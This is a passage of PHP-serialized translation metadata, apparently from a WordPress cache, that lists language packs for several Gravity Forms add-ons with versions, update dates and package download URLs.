(Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T07:59:34+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T07:59:36+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T07:59:38+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:20:\"gravityformsagilecrm\";a:1:{s:12:\"translations\";a:22:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-02-20T14:31:14+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2022-06-27T09:37:51+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T16:56:13+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T08:00:35+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"nl-be\";a:7:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2022-06-29T15:47:03+00:00\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-nl_BE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2022-06-27T08:36:09+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2022-06-27T08:36:11+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2022-06-27T08:36:16+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2021-09-13T08:58:31+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T16:56:17+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T16:56:35+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T16:56:37+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T16:56:43+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-03-14T17:37:39+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T08:00:37+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T08:00:40+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2021-09-27T21:55:07+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T08:00:45+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T16:56:26+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T08:00:49+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T08:00:51+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T08:00:54+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformsagilecrm/gravityformsagilecrm-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:24:\"gravityformsauthorizenet\";a:1:{s:12:\"translations\";a:21:{s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2022-06-23T19:14:14+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:22+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T08:01:40+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"nl-be\";a:7:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2022-06-29T15:48:18+00:00\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-nl_BE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2020-10-19T11:05:17+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2020-10-19T11:04:01+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:41+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:108:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-03-02T20:29:58+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2020-10-21T11:50:09+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T16:57:21+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T16:57:37+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T16:57:39+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T16:57:45+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-03-14T17:38:30+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:108:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2021-09-13T20:54:56+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2020-12-17T15:01:32+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2020-12-17T15:53:58+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T08:01:49+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T16:57:28+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T08:01:53+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2020-11-05T09:28:49+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:111:\"https://packages.translationspress.com/rocketgenius/gravityformsauthorizenet/gravityformsauthorizenet-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:21:\"gravityformsbatchbook\";a:1:{s:12:\"translations\";a:22:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2022-06-27T09:51:40+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2022-06-27T09:52:19+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T16:58:20+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2019-12-10T11:29:58+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2019-12-10T11:29:36+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2019-12-10T11:29:39+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2019-12-10T11:29:46+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2019-12-10T11:29:48+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T16:58:24+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T16:58:41+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2020-01-22T16:00:21+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T16:58:48+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-03-14T17:40:37+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"nb\";a:7:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T08:02:41+0